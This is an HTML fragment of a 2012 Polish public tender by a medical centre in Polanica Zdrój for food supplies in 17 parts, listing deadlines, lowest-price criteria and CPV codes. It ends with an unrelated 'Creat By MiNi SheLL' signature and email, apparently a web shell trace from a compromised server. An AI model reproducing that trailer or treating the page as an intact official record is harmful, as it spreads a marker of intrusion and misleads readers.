<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>W zakresie potwierdzenia, że oferowane dostawy, odpowiadają określonym wymaganiom należy przedłożyć:
 -  zaświadczenie niezależnego podmiotu zajmującego się poświadczaniem zgodności działań Wykonawcy z normami jakościowymi, jeżeli Zamawiający odwołują się do systemów zapewniania jakości opartych na odpowiednich normach europejskich.
Zaświadczenie to potwierdzać  ma posiadanie przez Wykonawcę  specjalistycznego transportu do przewozu art. spożywczych dla części 2,3,5,6,8,9,10,11,12,13,14,15,16,17 a dla części 1, 4, 5, 7 
o posiadaniu specjalistycznego transportu chłodniczego.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.scm.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Specjalistyczne Centrum Medyczne , Dział Zamówień Publicznych pok. nr 7 57-320 Polanica Zdrój ul. Jana Pawła II nr 2...</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.04.2012 godzina 11:00, miejsce: 23.04.2012 godzina 11:00, miejsce: Specjalistyczne Centrum Medyczne ,57-320 Polanica Zdrój ul. Jana Pawła II nr 2. Kancelaria za recepcja główną..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> do 22.05.2012.</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> produkty zwierzęce, mięso i produkty mięsne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> produkty zwierzęce, mięso i produkty mięsne.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.10.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 8.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> produkty mleczarskie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> produkty mleczarskie.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.00.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 8.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> różne produkty spożywcze.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> óżne produkty spożywcze.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.80.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 8.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> drób.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> drób.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.11.12.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 8.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> ryby przetworzone i konserwowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ryby przetworzone i konserwowe.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.20.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 8.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> owoce warzywa przetworzone.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> owoce warzywa przetworzone.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.30.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 8.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> warzywa mrożone.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> warzywa mrożone.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.33.11.70-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 8.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> pieczywo świeże, wyroby piekarnicze i ciastkarskie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> pieczywo świeże, wyroby piekarnicze i ciastkarskie.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.81.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 8.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> produkty przemiału ziarna, skrobi i produktów skrobiowych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> produkty przemiału ziarna, skrobi i produktów skrobiowych.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.60.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 8.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> oleje i tłuszcze zwierzęce lub roślinne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> oleje i tłuszcze zwierzęce lub roślinne.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.40.00.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 8.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> ryby wędzone.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ryby wędzone.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.23.40.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 8.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> napoje bezalkoholowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> napoje bezalkoholowe.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.98.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 8.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 13 <b>NAZWA:</b> wody mineralne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> wody mineralne.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.98.10.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 8.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 14 <b>NAZWA:</b> warzywa i owoce.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> warzywa i owoce.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.00.00.00-1, 03.22.10.00-6, 03.22.20.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 8.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 15 <b>NAZWA:</b> warzywa i owoce.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> warzywa i owoce.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.00.00.00-1, 03.22.10.00-6, 03.22.20.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 8.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 16 <b>NAZWA:</b> ziemniaki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ziemniaki.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.00.00.00-1, 03.21.21.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 8.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 17 <b>NAZWA:</b> jaja.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> jaja.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.00.00.00-1, 03.14.25.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 8.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com